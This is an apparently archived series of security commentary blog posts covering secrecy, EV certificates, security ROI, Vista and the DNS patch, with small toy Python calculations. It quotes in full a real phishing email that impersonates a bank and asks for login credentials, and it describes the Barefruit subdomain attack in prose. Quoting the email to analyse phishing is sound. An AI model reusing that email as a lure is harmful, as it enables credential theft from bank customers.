    "If our founding fathers were taking part in this debate (about the future organization of the government's cybersecurity activities) there is no doubt in my mind they would support a separation of security powers among different (government) organizations, in line with their commitment to checks and balances."

    In a letter to Homeland Security Secretary Janet Napolitano last week, Beckstrom said the NSA "dominates most national cyber efforts" and "effectively controls DHS cyber efforts through detailees, technology insertions and the proposed move" of the NCSC to an NSA facility at the agency's Fort Meade, Md., headquarters.

    It's called "the equity debate" for reasons obscure. Basically, the mission of the NSA is to breach our security. The theory has it that the NSA did this (partly) by ensuring that our security -- the security of the entire net -- was flaky enough for them to get in. Now we all pay the price, as the somewhat slower but more incisive criminal economy takes its tax.

    Quite how we get from that NSA mission to where we are now is a rather long walk, and to be fair, the evidence is a bit scattered and tenuous. Unsurprisingly, the above resignation does not quite "spill the beans," thus preserving the beanholder's good name. But it is certainly good to see someone come out and say: these guys are ruining the party for all of us.

    Posted by iang at 07:00 PM | Comments (4) | TrackBack

    January 16, 2009

    What's missing in security: business

    Those of us who are impacted by the world of security suffer under a sort of love-hate relationship with the word; so much of it is how we build applications, but so much of what is labelled security out there in the rest of the world is utter garbage.

    So we tend to spend a lot of our time reverse-engineering popular security thought and finding the security bugs in it. I think I've found another one. Consider this very concise and clear description from Frank Stajano, who has published a draft book section seeking comments:

    The viewpoint we shall adopt here, which I believe is the only one leading to robust system security engineering, is that security is essentially risk management. In the context of an adversarial situation, and from the viewpoint of the defender, we identify assets (things you want to protect, e.g. the collection of magazines under your bed), threats (bad things that might happen, e.g. someone stealing those magazines), vulnerabilities (weaknesses that might facilitate the occurrence of a threat, e.g. the fact that you rarely close the bedroom window when you go out), attacks (ways a threat can be made to happen, e.g. coming in through the open window and stealing the magazines - as well as, for good measure, that nice new four-wheel suitcase of yours to carry them away with) and risks (the expected loss caused by each attack, corresponding to the value of the asset involved times the probability that the attack will occur). Then we identify suitable safeguards (a priori defences, e.g. welding steel bars across the window to prevent break-ins) and countermeasures (a posteriori defences, e.g. welding steel bars to the window after a break-in has actually occurred, or calling the police). Finally, we implement the defences that are still worth implementing after evaluating their effectiveness and comparing their (certain) cost with the (uncertain) risk they mitigate.

    (My emphases.) That's a good description of how the classical security world sees it. We start by asking, "What's your threat model?" Then out of that we build a security model to deal with those threats. The security model then incorporates some knowledge of risks to manage the tradeoffs.
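
    Stajano's final step, comparing the (certain) cost against the (uncertain) risk, is just expected-value arithmetic. A toy version in Python, with invented numbers, and assuming each safeguard fully averts the risk:

        asset_value = 500.0     # the magazine collection, say
        p_attack = 0.05         # annual chance the open window is used

        risk = asset_value * p_attack   # expected annual loss = 25.0

        safeguards = {"weld steel bars": 400.0, "close the window": 5.0}
        for name, cost in safeguards.items():
            verdict = "implement" if cost < risk else "skip"
            print(f"{name}: cost {cost:.2f} vs expected loss {risk:.2f} -> {verdict}")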

    The bit that's missing is the business. Instead of asking "What's your threat model?" as the first question, it should be "What's your business model?" Security asks that last, and only partly, through questions like "what are the risks?"

    Calling security "risk management", then, is a sort of nod to the point that security has a purpose within business; by focussing on some risks, the security modellers can preserve their existing model while tying it to the business. But it is still backwards; it still seeks to add risks at the end, and will still result in "security" being just the annoying monkey on the back.

    Instead, the first question should be "What's your business model?"

    This unfortunately opens Pandora's box, because that implies that we can understand a business model. Assuming it is the case that your CISO understands a business model, it does rather imply that the only security we should be pushing is that which is from within. From inside the business, that is. The job of the security people is not therefore to teach and build security models, but to improve the abilities of the business people to incorporate good security as they are doing their business.

    Which perhaps brings us full circle to the popular claim that the best security is that which is built in from the beginning.

    Posted by iang at 03:51 AM | Comments (4) | TrackBack

    December 07, 2008

    Security is a subset of Reliability

    From the "articles I wish I'd written" department, Chandler points to an article by Daniels Geer & Conway on all the ways security is really a subset of reliability. Of course!

    I think this is why the best engineers who've done great security things start from the top; from the customer, the product, the market. They know that in order to secure something, they had better know what the something is before even attempting to add a cryptosec layer over it.

    Which is to say, security cannot be a separate discipline. It can be a separate theory, a bit like statics is a theory from civil engineering, or triage is a part of medicine. You might study it in University, but you don't get a job in it; every practitioner needs some basic security. If you are a specialist in security, your job is more or less to teach it to practitioners. The alternate is to ask the practitioners to teach you about the product, which doesn't seem sensible.

    Posted by iang at 07:12 PM | Comments (1) | TrackBack

    Unwinding secrecy -- how to do it?

    The next question on unwinding secrecy is how to actually do it. It isn't as trivial as it sounds. Perhaps this is because the concept of "need-to-know" is so well embedded in the systems and managerial DNA that it takes a long time to root it out.

    At LISA I was asked how to do this, but I don't have much of an answer. Here's what I have observed:

    • Do a little at a time.
    • Pick a small area and start re-organising it. Choose an area where there is lots of frustration and lots of people to help. Open it up by doing something like a wiki, and work the information. It will take a lot of work and pushing by yourself, mostly because people won't know what you are doing or why (even if you tell them).
    • What is needed is a success. That is, a previously secret area is opened up, and as a result, good work gets done that was otherwise inhibited. People need to see the end-to-end journey in order to appreciate the message. (And, obviously, it should be clear at the end of it that you don't need the secrecy as much as you thought.)
    • Whenever some story comes out about a successful opening of secrecy, spread it around. The story probably isn't relevant to your organisation, but it gets people thinking about the concept. E.g., that which I posted recently was done to get people thinking. Another from Chandler.
    • Whenever there is a success on openness inside your organisation, help to make this a showcase (here are three). Take the story and spread it around; explain how the openness made it possible.
    • When some decision comes up about "and this must be kept secret," discuss it. Challenge it, make it prove itself. Remind people that we are an open organisation and there is benefit in treating all as open as possible.
    • Get a top-level decision that "we are open." Make it broad, make it serious, and incorporate the exceptions. "No, we really are open; all of our processes are open except when a specific exception is argued for, and that must be documented and open!" Once this is done, from top-level, you can remind people in any discussion. This might take years to get, so have a copy of a resolution in your back pocket for a moment when suddenly, the board is faced with it, and minded to pass a broad, sweeping decision.
    • Use phrases like "security-by-obscurity." Normally, I am not a fan of these as they are very often wrongly used; so-called security-by-obscurity often tans the behinds of supposed open standards models. But it is a useful catchphrase if it causes the listener to challenge the obscure security benefits of secrecy.
    • Create an opening protocol. Here's an idea I have seen: when someone comes across a secret document (generally after much discussion ...) that should not have been kept secret, let them engage in the Opening-Up Protocol without any further ado. Instead of grumbling or asking, put the ball in their court. Flip it around, and take the default as to be open:
      "I can't see why document X is secret, it seems wrong. Therefore, in 1 month, I intend to publish it. If there is any real reason, let me know before then."
      This protocol avoids the endless discussions as to why and whether.

    Well, that's what I have thought about so far. I am sure there is more.

    Posted by iang at 01:24 PM | Comments (0) | TrackBack

    November 20, 2008

    Unwinding secrecy -- busting the covert attack

    Have a read of this. Quick summary: Altimo thinks Telenor may be using espionage tactics to cause problems.

    Altimo alleges the interception of emails and tapping of telephone calls, surveillance of executives and shareholders, and payments to journalists to write damaging articles.

    So instead of getting its knickers in a knot (court case or whatever) Altimo simply writes to Telenor and suggests that this is going on, and asks for confirmation that they know nothing about it, do not endorse it, etc.

    Who ya bluffin?

    ...Andrei Kosogov, Altimo's chairman, wrote an open letter to Telenor's chairman, Harald Norvik, asking him to explain what Telenor's role has been and "what activity your agents have directed at Altimo". He said that he was "reluctant to believe" that Mr Norvik or his colleagues would have sanctioned any of the activities complained of.

    .... Mr Kosogov said he first wrote to Telenor in October asking if the company knew of the alleged campaign, but received no reply. In yesterday's letter to Mr Norvik, Mr Kosogov writes: "We would welcome your reassurance that Telenor's future dealings with Altimo will be conducted within a legal and ethical framework."

    Think about it: This open disclosure locks down Telenor completely. It draws a firm line in time, as also, gives Telenor a face-saving way to back out of any "exuberance" it might have previously "endorsed." If indeed Telenor does not take this chance to stop the activity, it would be negligent. If it is later found out that Telenor's board of directors knew, then it becomes a slam-dunk in court. And, if Telenor is indeed innocent of any action, it engages them in the fight to also chase the perpetrator. The bluff is called, as it were.

    This is good use of game theory. Note also that the Advisory Board of Altimo includes some high-powered people:

    Evidence of an alleged campaign was contained in documents sent to each member of Altimo's advisory board some time before October. The board is chaired by ex-GCHQ director Sir Francis Richards, and includes Lord Hurd, a former UK Foreign Secretary, and Sir Julian Horn-Smith, a founder of Vodafone.

    We could speculate that those players -- the spooks and mandarins -- know how powerful open disclosure is in locking down the options of nefarious players. A salutary lesson!

    Posted by iang at 06:25 PM | Comments (1) | TrackBack

    November 19, 2008

    Unwinding secrecy -- how far?

    One of the things that I've gradually come to believe in is that secrecy in anything is more likely to be a danger to you and yours than a help. The reasons for this are many, but include:

    • hard to get anything done
    • your attacker laughs!
    • ideal cover for laziness, a mess or incompetence

    There are no good reasons for secrecy, only less bad ones. If we accept that proposition, and start unwinding the secrecy so common in organisations today, there appear to be two questions: how far to open up, and how do we do it?

    How far to open up appears to be a personal-organisational issue, and perhaps the easiest thing to do is to look at some examples. I've seen three in recent days which I'd like to share.

    First the Intelligence agencies: in the USA, they are now winding back the concept of "need-to-know" and replacing it with "responsibility-to-share".


    Implementing Intellipedia Within a "Need to Know" Culture

    Sean Dennehy, Chief of Intellipedia Development, Directorate of Intelligence, U.S. Central Intelligence Agency

    Sean will share the technical and cultural changes underway at the CIA involving the adoption of wikis, blogs, and social bookmarking tools. In 2005, Dr. Calvin Andrus published The Wiki and The Blog: Toward a Complex Adaptive Intelligence Community. Three years later, a vibrant and rapidly growing community has transformed how the CIA aggregates, communicates, and organizes intelligence information. These tools are being used to improve information sharing across the U.S. intelligence community by moving information out of traditional channels.

    The way they are doing this is to run a community-wide suite of social network tools: blogs, wikis, youtube-copies, etc. The access is controlled at the session level by the username/password/TLS and at the person level by sponsoring. That latter means that even contractors can be sponsored in to access the tools, and all sorts of people in the field can contribute directly to the collection of information.

    The big problem with this switch is that intelligence information is not only controlled by "need to know" but also in horizontal layers. For the sake of this discussion, there are three: TOP SECRET / SECRET / UNCLASSIFIED-CONTROLLED. The intel community's solution is to run 3 separate networks in parallel, one for each layer, and to control access to each of these. So in effect, contractors might be easily sponsored into the lowest level, but less likely into the others.

    What happens in practice? The best coverage is found in the network that has the largest number of people, which of course is the lowest, UNCLASSIFIED-CONTROLLED network. So, regardless of the intention, most of the good stuff is found in there, and where higher-layer stuff adds value, there are little pointers embedded on how to find it.

    In a nutshell, the result is that anyone who is "in" can see most everything, and modify everything. Anyone who is "out" cannot. Hence, a spectacular success if the mission was to share; it seems so obvious that one wonders why they didn't do it before.

    As it turns out, the second example is quite similar: Google. A couple of chaps from there explained to me around the dinner table that the process is basically this: everyone inside google can talk about any project to any other insider. But, one should not talk about projects to outsiders (presumably there are some exceptions). It seems that SEC (Securities and Exchange Commission in USA) provisions for a public corporation lead to some sensitivity, and rather than try and stop the internal discussion, google chose to make it very simple and draw a boundary at the obvious place.

    The third example is CAcert. In order to deal with various issues, the Board chose to go totally open last year. This means that all the decisions, all the strategies, all the processes should be published and discussable by all. Some things aren't out there yet, but they should be; if an exception is needed, it must be argued and put into policies.

    The curious thing is why CAcert did not choose to set a boundary at some point, like google and the intelligence agencies. Unlike google, there is no regulator to say "you must not reveal inside info of financial import." Unlike the CIA, CAcert is not engaging in a war with an enemy where the bad guys might be tipped off to some secret mission.

    However, CAcert does have other problems, and it has one that tips it in the balance of total disclosure: the presence of valuable and tempting privacy assets. These seem to attract a steady stream of interested parties, and some of these parties are after private gain. I have now counted 4 attempts at this in my time related to CAcert, and although each had its interesting differences, each in its own way sought to employ CAcert's natural secrecy to its own advantage. From a commercial perspective, this was fairly obvious, as the interested parties sought to keep their negotiations confidential, and this allowed them to pursue the sales process and sell the insiders without wiser heads putting a stop to it. To the extent that there are incentives for various agencies to insert different agendas into the inner core, the CA needs a way to manage that process.

    How to defend against that? Well, one way is to let the enemy of your enemy know whom we are talking to. Let's take a benign example which happened (sort of): a USB security stick manufacturer might want to ship extra stuff, like CAcert's roots, on the stick. Does he want the negotiations to be private because other competitors might deal for equal access, or does he want them private because wiser heads will figure out that he is really after CAcert's customer list? CAcert might care more about one than the other, but both are threats to someone. As the managers aren't smart enough to see every angle, every time, they need help. One defence is many eyeballs, and this is something that CAcert does have available to it. Perhaps if sufficient info on an emerging deal is published, the rest of the community can figure it out. Perhaps, if the enemy's enemy notices what is going on, he can explain the tactic.

    A more poignant example might be someone seeking to pervert the systems and get some false certificates issued. In order to deal with those, CAcert's evolving Security Manual says all conflicts of interest have to be declared broadly and in advance, so that we can all mull over them and watch for how these might be a problem. This serves up a dilemma to the secret attacker: either keep private and lie, and risk exposure later on, or tell all upfront and lose the element of surprise.

    This method, if adopted, would involve sacrifices. It means that any agency that is looking to impact the systems is encouraged to open up, and this really puts the finger on them: are they trying to help us or themselves? Also, it means that all people in critical roles might have to sacrifice their privacy. This latter sacrifice, if made, is to preserve the privacy of others, and it is the greater for it.

    Posted by iang at 05:16 PM | Comments (0) | TrackBack

    October 19, 2008

    What happened in security over the last 10 years?

    I keep having the same discussion in various places, and keep coming back to this eloquent description of where we are:

    Gunnar's full blog post is here ... it includes some other things, but nothing quite so poignant.

    Web Security hasn't moved since 1995. Oh well.

    Posted by iang at 09:19 PM | Comments (3) | TrackBack

    October 06, 2008

    Browser Security UI: the horns of the dilemma

    One of the dilemmas that the browser security UI people have is that they have to deal with two different groups at the same time. One is the people who can work with the browser, and the other is those who blindly click when told to. The security system known as secure browsing seems to be designed for both groups at the same time, thus leading to bad results. For example, Dan Kaminsky counted another scalp when he found, back in April, that ISPs are doing MITMs on their customers:

    The rub comes when a user is asking for a nonexistent subdomain of a real website, such as http://webmale.google.com, where the subdomain webmale doesn't exist (unlike, say, mail in mail.google.com). In this case, the Earthlink/Barefruit ads appear in the browser, while the title bar suggests that it's the official Google site.

    As a result, all those subdomains are only as secure as Barefruit's servers, which turned out to be not very secure at all. Barefruit neglected basic web programming techniques, making its servers vulnerable to a malicious JavaScript attack. That meant hackers could have crafted special links to unused subdomains of legitimate websites that, when visited, would serve any content the attacker wanted.

    The hacker could, for example, send spam e-mails to Earthlink subscribers with a link to a webpage on money.paypal.com. Visiting that link would take the victim to the hacker's site, and it would look as though they were on a real PayPal page.

    That's a subtle attack, one which the techies can understand but the ordinary users cannot. Here's a simpler one (hat-tip to Duane), a straight phish:

    Dear Wilmington Trust Banking Member,

    Due to the high number of fraud attempts and phishing scams, it has been decided to implement EV SSL Certification on this Internet Banking website.

    The use of EV SSL certification works with high security Web browsers to clearly identify whether the site belongs to the company or is another site imitating that company’s site.

    It has been introduced to protect our clients against phishing and other online fraudulent activities. Since most Internet related crimes rely on false identity, WTDirect went through a rigorous validation process that meets the Extended Validation guidelines.

    Please Update your account to the new EV SSL certification by Clicking here.

    Please enter your User ID and Password and then click Go.

    (Failure to verify account details correctly will lead to account suspension)

    This is a phish email seen in the wild. We here -- the techies -- all know what's wrong with this attack, but can you explain it to your grandma? What is being attacked here is the brand of EV rather than the technology. In effect, the more ads that relate EV to security in a simplistic fashion, the better this attack works.

    To evade this, the banks have to promote better practices amongst their clients, and they have to include the user in the protocol. But they are not being helped, it seems.

    On the one hand, a belief commonly held among security developers is that users cannot be bothered with security, ignore any attempts at it, and are therefore best not bothered with it. Much as I like the mantra of "there is only one mode, and it is secure," it isn't going to work in the web case unless we do the impossible: drop HTTP and make HTTPS mandatory, solve the browser universality issue (note Chrome's efforts), and unify the security models end-to-end. As the group of Internet people who can follow all that is vanishingly small, this is a non-starter.

    On the other not-so-helpful hand, the pushers of certificates often find themselves caught between the horns of pushing more product (at a higher price) and providing for the basic needs of the customers. I recently came across two cases at the extremes of the market. At the unpaid end, the ability of a company to conveniently populate 50,000 desktops is, it is claimed, more important than meeting expectations about verification of contents. The problem with this approach is that if people see strong expectations on one side, and casual promises on another equivalent side, the entire brand suffers.

    And, at the expensive EV extreme of the market, the desire to sell a product can sometimes lead to exaggerated claims, as in a recent advertisement in the German paper press, seen above (hat-tip to Philipp), which includes perhaps over-broad or over-high claims. Translating from German to English:

    The latest and best in terms of online security. And green, too.

    Visible security for your site, from a company your customers trust.

    It is quite simple: a green address bar means that your site is secure.

    These claims are easy to make, and they may help sell certs. But they also help the above phishing attack, as they clearly make simple connections between security and EV.

    "EV means security, gotta get me some of that! Click!" FTR, check the translator.

    What would be somewhat more productive than sweeping marketing claims is to decide what it is that the green thing really means.

    I have heard one easy answer: EV means whatever the CA/Browser Forum Guidelines says it means. OK, but not so fast: I do not recall that it said anywhere that your site has to be secure! I admit to not having read it for a while, but the above advert seems entirely at odds with a certificate claim.

    Further, because that document is long and involved, something clearer and shorter would be useful if there are any pretensions of saying anything to customers.

    If you don't want to say anything to customers, then the Guidelines are fine. But then, what is the point of certs?

    The above is just about EV, but that's just a foil for the wider problem: no CA makes this easy, as yet. I believe it to be an important task for certificate authorities to come up with a simple claim that they can make to users. Something clear, something a user can take to court.

    Indeed, it would be good for all CAs and all browsers to have their claims clearly presented to users, as the users are being told that there is a benefit. To them. Frequently, for years and years now. And now they are at risk, both of losing that benefit and because of that benefit.

    What is that benefit? Can you show it? Can you state it? Can you present it to your grandma? And, will you stand behind her, in court, and explain it to the judge?

    Posted by iang at 05:27 AM | Comments (2) | TrackBack

    September 20, 2008

    Builders v. Breakers

    Gunnar lauds a post on why there are few architects in the security world:

    Superb post by Mark on what I think is the biggest problem we have in security. One thing you learn in consulting is that no matter what anyone tells you when you start a project about what problem you are trying to solve, it is always a people problem. The single biggest problem in security is too many breakers not enough builders. Please understand I am not saying that breakers are not useful, we need them, and we need them to continue to get better so we can build more resilient systems. But the industry is about 90% breaking and 10% building and that's plain bad.

    It’s still predominantly made up of an army of skilled hackers focused on better ways to break systems apart and find new ways to exploit vulnerabilities than “security architects” who are designing secure components, protocols and ultimately secure systems.

    Hear hear! And why is this? One easy answer: breaking something is a solid metric. It's either broken or not, in general. Any journo can understand it.

    On the other hand, building is too diffuse a signal. There is no easy number, there is no binary result. It takes a business focus over decades to understand that one architecture delivers more profits for users and corporates alike than another, and by then the architects have moved on, so even then, the result may not be clear.

    Let's take an old example. Back around 1996, a couple of bored uni students cracked Netscape's secure browsing. The first time was by crunching the 40 bit crypto using the idle lab computers, and the second time was by predicting the less-than-random numbers injected into the protocol. These students were lauded in the press for having done something grand.

    They then went on to a much harder task, and were almost never heard of again. What was that harder task? Building secure and usable systems. One of them tried to build a secure communications platform, another is trying to build a secure computing platform. So far, they have not succeeded at either task, but these are much harder tasks.

    The true heroes back in the mid-1990s were the Netscape engineers who got something going and delivered it to the public, not the kids who scratched the paint off it. The breaches mentioned above were jokes, and bad ones at that, because they distracted attention from what was really being built. Case in point: even today, if we had twice as much 40-bit crypto as we do 128-bit crypto, we'd probably be twice as secure, because the attack of relevance simply isn't the bored uni student; it is the patient phisher.

    If you recall names in this story, recall them for what they tried to build, and not for what they broke.

    Posted by iang at 05:59 AM | Comments (8) | TrackBack

    September 18, 2008

    Macs for security (now, with new improved NSA hardening tips!)

    Frequent browsers will recall that the top tip number 1 for every user out there is to buy a Mac. That's for several reasons:

    • the security engineering is solid, based on around 15 years of security programming tradition in Unix
    • Apple have also maintained a security tradition, from well before OSX
    • it retains a "smaller market share," so the monoculture bounty falls on the dominant platform instead

    Now there is another reason: hardening tips from the NSA (or here with disclaimers).

    Well, this isn't exactly a reason, more a bonus (likely there are hardening tips for other popular operating systems as well). However, it is a useful resource for those people who really want more than a standard user install, without the compromises!

    (Note, many of the hardening tips are beyond normal users, so seek experienced advice before following them slavishly.)

    Posted by iang at 12:11 PM | Comments (2) | TrackBack

    September 03, 2008

    Yet more evidence: your CISO needs an MBA

    I have in the past presented the strawman that your CISO needs an MBA. Nobody has yet succeeded in knocking it down, and it is proving surprisingly resilient. Yet more evidence comes from Bruce Schneier's blog post of yesterday:

    Return on investment, or ROI, is a big deal in business. Any business venture needs to demonstrate a positive return on investment, and a good one at that, in order to be viable.

    It's become a big deal in IT security, too. Many corporate customers are demanding ROI models to demonstrate that a particular security investment pays off. And in response, vendors are providing ROI models that demonstrate how their particular security solution provides the best return on investment.

    It's a good idea in theory, but it's mostly bunk in practice.

    Bunk is wrong. Let's drill down. It works this way: NPV (net present value) and ROI (its lesser cousin) are mathematical tools for choosing between alternative projects. Keep the notion of comparison tightly in your mind.

    The tools measure the money going in versus the money going out in a neutral way. They are entirely neutral between projects because NPV is just mathematics, and the same mathematics is used for each project. (See the top part of Richard's post.)

    Obviously, any result from the model depends totally on the inputs, so a great deal of care and theory is needed to supply proper inputs. And it is here that security projects have trouble, in that we don't have a good view as to how to predict attack costs. To be clear, there is no controversy about the inputs being a big problem.

    But, assuming we have the theory, the process and the inputs, we can, again in principle, measure fairly across all projects.

    That's how it works. As you can see above, we do not make a distinction between investment, savings, costs, returns or profits. Why not? Because the NPV model and the numbers don't, either.

    What then goes wrong with security people when they say ROI doesn't apply to security?

    Before I get into the details, there's one point I have to make. "ROI" as used in a security context is inaccurate. Security is not an investment that provides a return, like a new factory or a financial instrument. It's an expense that, hopefully, pays for itself in cost savings. Security is about loss prevention, not about earnings. The term just doesn't make sense in this context.

    Or, or here:

    The bottom line is that security saves money; it does not create money.

    It seems that they seize on the words investment and returns, etc., and realise that the words differ from costs and savings. In conceptual or balance sheet terms, they do differ, but here's the catch: to the models of NPV and ROI, it's all the same. In this sense, we could say that the title of ROI is a misnomer, or that there are several meanings to the word "investment" and they've seized on the wrong one.

    If you are good at maths, consider it simply as a model that deals equally well with negative numbers as with positive ones. To the model, savings are just negatives of returns.
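
    A toy calculation in Python shows why the model is indifferent: one project's cash flows are revenues, the other's are avoided losses, and the mathematics cannot tell them apart. Cash flows invented, discount rate 10%.

        def npv(rate, flows):
            # flows[0] is today's outlay (negative); later entries are
            # yearly revenues, or yearly losses that no longer occur.
            return sum(f / (1 + rate) ** t for t, f in enumerate(flows))

        factory = [-1000.0, 450.0, 450.0, 450.0]    # invest, then earn
        security = [-300.0, 150.0, 150.0, 150.0]    # invest, then *not lose*

        for name, flows in (("factory", factory), ("security", security)):
            print(f"{name}: NPV = {npv(0.10, flows):+.2f}")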

    Now, if your security director had an MBA, she would know that the purpose of NPV is to compare projects, and not anything else, like generating returns. She would also know that the model is neutral, and that the ability to handle negative numbers mean that expenses and savings can be compared as well. She would further know that the problems occur in the inputs and assumptions, not in the model.

    Finally, she would know how to speak in the language of finance, which is the language that the finance people use. This might sound obvious, but it isn't so clear. As a generalism, it is this last point that is probably most significant about the MBA concept: it teaches you the language of all the other specialities. It doesn't necessarily make you a whizz at finance, or human resources, or marketing. But it at least lets you talk to them in their language. And, it reminds you that the other professions do have some credibility, so if they say something, listen first before teaching them how to suck eggs.

    Posted by iang at 10:09 AM | Comments (2) | TrackBack

    August 25, 2008

    Should a security professional have a legal background?

    Graeme points to this entry that posits that security people need a legal background:

    My own experience and talking to colleagues has prompted me to wonder whether the day has arrived that security professionals will need a legal background. The information security management professional is under increasing pressure to cope with the demands of the organization for access to information, to manage the expectations of the data owner on how and where the information is going to be processed and to adhere to regulatory and legal requirements for the data protection and archiving. In 2008, a number of rogue trader and tax evasion cases in the financial sector have heightened this pressure to manage data.

    The short, sharp answer is no, but it is a little more nuanced than that. First, let's take the rogue trader issue, being someone who has breached the separation of roles within a trading company, and used it to bad effect. To spot and understand this requires two things: an understanding of how settlement works, and the principle of dual control. It does not require the law, at all. Indeed, the legal position of someone who has breached the separation, and has "followed instructions to make a lot of money" is a very difficult subject. Suffice to say, studying the law here will not help.

    Secondly, asking security people to study law so as to deal with tax evasion is equally fruitless but for different reasons: it is simply too hard to understand, it is less law than an everlasting pitched battle between the opposing camps.

    Another way of looking at this is to look at the FC7 thesis, which says that, in order to be an architect in financial cryptography, you need to be comfortable with cryptography, software engineering, rights, accounting, governance, value and finance. The point is not whether law is in there or not, but that there are an awful lot of important things that architects or security directors need before they need law.

    Still, an understanding of the law is no bad thing. I've found several circumstances where it has been very useful to me and people I know:

    • Contract law underpins the Ricardian contract.
    • Dispute resolution underpins the arbitration systems used in sensitive communities (such as WebMoney and CAcert).
    • Someone experienced in dispute resolution looking at the ICANN dispute system realises that touching domain registries can do grave harm. In the alternate, a jurist looking at the system will not come to that conclusion at all.

    In this case, the law knowledge helps a lot. Another area which is becoming more and more of an issue is that of electronic evidence. As most evidence is now entering the digital domain (80% was a recent unreferenced claim) there is much to understand here, and much that one can do to save one's company. The problem with this, as lamented at the recent conference, is that any formal course of law includes nothing on electronic evidence. For that, you have to turn to books like those by Stephen Mason on Electronic Evidence. But that you can do yourself.

    Posted by iang at 03:38 PM | Comments (3) | TrackBack

    July 11, 2008

    wheretofore Vista? Microsoft moves to deal with the end of the Windows franchise

    Since the famous Bill Gates Memo, around the same time as phishing and related frauds went institutional, Microsoft has switched around to deal with the devil within: security. In so doing, it has done what others should have done, and done it well. However, there was always going to be a problem with turning the super-tanker called Windows into a battleship.

    I predicted a while back that (a) Vista would probably fail to make a difference, and (b) the next step was to start thinking of a new operating system. This wasn't the normal pique, but the cold-hearted analysis of the size of the task. If you work for 20 years making your OS easy but insecure, you don't have much chance of fixing that, even with the resources of Microsoft.

    The Economist brings an update on both points. Firstly, on Vista's record after 18 months in the market:

    To date, some 140m copies of Vista have been shipped compared with the 750m or more copies of XP in daily use. But the bulk of the Vista sales have been OEM copies that came pre-installed on computers when they were bought. Anyone wanting a PC without Vista had to order it specially.

    Meanwhile, few corporate customers have bought upgrade licences they would need to convert their existing PCs to Vista. Overwhelmingly, Windows users have stuck with XP.

    Even Microsoft now seems to accept that Vista is never going to be a blockbuster like XP, and is hurrying out a slimmed-down tweak of Vista known internally as Windows 7. This Vista lite is now expected late next year instead of 2010 or 2011.

    It's not as though Vista is a dud. Compared with XP, its kernel—the core component that handles all the communication between the memory, processor and input and output devices—is far better protected from malware and misuse. And, in principle, Vista has better tools for networking. All told, its design is a definite improvement—albeit an incremental one—over XP.

    Microsoft tried and failed to turn it around, security+market-wise. We might now be looking at the end of the franchise known as Windows. To be clear, while we are past the peak, any ending is a long way off in the distant future.

    Classical strategy thinking says that there are two possible paths here: invest in a new franchise, or go "cash-cow". The latter means that you squeeze the revenues from the old franchise as long as possible, and delay the termination of the franchise as long as possible. The longer you delay the end, the more revenues you get. The reason for doing this is simple: there is no investment strategy that makes money, so you should return the money to the shareholders. There is a simple example here: the music majors are decidedly in cash-cow, today, because they have no better strategy than delaying their death by a thousand file-shares.

    Certainly, with Bill Gates easing out, it would be possible to go cash-cow, but of course, we on the outside can only cast our auguries and wonder at the signs. The Economist suggests that they may have taken the investment route:

    Judging from recent rumours, that's what it is preparing to do. Even though it won't be in Windows 7, Microsoft is happy to talk about “MinWin”—a slimmed down version of the Windows core. It’s even willing to discuss its “Singularity” project—a microkernel-based operating system written strictly for research purposes. But ask about a project code-named “Midori” and everyone clams up.

    By all accounts, Midori (Japanese for “green” and, by inference, “go”) capitalises on research done for Singularity. The interesting thing about this hush-hush operating system is that it’s not a research project in the normal sense. It's been moved out of the lab and into incubation, and is being managed by some of the most experienced software gurus in the company.

    With only 18 months before Vista is to be replaced, there's no way Midori—which promises nothing less than a total rethink of the whole Windows metaphor—could be ready in time to take its place. But four or five years down the road, Microsoft might just confound its critics and pleasantly surprise the rest of us.

    Comment? Even though I predicted Microsoft would go for a new OS, I think this is a tall order. There are two installed bases in the world today, being Unix and Windows. It's been that way for a long time, and efforts to change those two bases have generally failed. Even Apple gave up and went Unix. (The same economics works against the repeated attempts to upgrade the CPU instruction set.)

    The flip-side of this is that the two bases are incredibly old and out-of-date. Unix's security model is "ok" but decidedly pre-PC; much of what it does is simply irrelevant to the modern world. For example, all the user-to-user protection is pointless in a one-user-one-PC environment, and the major protection barrier has accidentally become a hack known as TCP/IP, legendary for its inelegant grafting onto Unix. Windows has its own issues.

    So we know two things: a redesign is decades over-due. And it won't budge the incumbents; both are likely to live another decade without appreciable change to the markets. We would need a miracle, or better, a killer-app to budge the installed base.

    Hence the cold-hearted analysis of cash-cow wins out.

    But wait! The warm-blooded humanists won't let that happen for one and only one reason: it is simply too boring to contemplate. Microsoft has so many honest, caring, devoted techies within that if a decision were made to go cash-cow, there would be a mass-defection. So the question then arises, what sort of a hybrid will be acceptable to shareholders and workers? Taking a leaf from recent politics, which is going through a peak-energy-masquerade of its own these days, some form of "green platform" has appeal to both sides of the voting electorate.

    Posted by iang at 09:26 AM | Comments (2) | TrackBack

    July 10, 2008

    DNS rebinding attack/patch: the germination of professional security cooperation?

    Lots of chatter is seen in the security places about a patch to DNS coming out. It might be related to Dan's earlier talks, but he also makes a claim that there is something special in this fix. The basic idea is that DNS replies are now on randomised ports (or some such) and this will stop spoofing attempts of some form. You should patch your DNS.
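    To see why the port randomisation matters, here is a back-of-the-envelope sketch (my numbers and simplifications, not Kaminsky's): a spoofed reply must match the query's 16-bit transaction ID, and with a fixed source port that is all the entropy an attacker has to guess.

        # Chance that a burst of forged replies beats the real answer,
        # against one outstanding query (blind spoofing, simplified).
        TXID_SPACE = 2 ** 16    # DNS transaction IDs
        PORT_SPACE = 2 ** 16    # roughly, the usable source ports

        def spoof_probability(forged, randomise_port):
            space = TXID_SPACE * (PORT_SPACE if randomise_port else 1)
            return min(1.0, forged / space)

        print(spoof_probability(65536, randomise_port=False))  # 1.0
        print(spoof_probability(65536, randomise_port=True))   # ~0.000015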

    Many are skeptical, and this gives us an exemplary case study of today's "security" industry:

    Ptacek: If the fix is “randomize your source ports”, we already knew you were vulnerable. Look, DNS has a 16 bit session ID… how big is an ASPSESSIONID or JSESSIONID? When you get to this point you are way past deck chairs on the titanic, but, I mean, the web people already know this. This is why TLS/SSL totally doesn’t care about the DNS. It is secure regardless of the fact that the DNS is owned.

    Paraphrased: "Oh, we knew about that, so what?" As above, much of the chatter in other groups is about how this apparently fixes something that is long known, therefore insert long list of excuses, hand-wringing, slap-downs, and is not important. However, some of the comments are starting to hint at professionalism. Nathan McFeters writes:

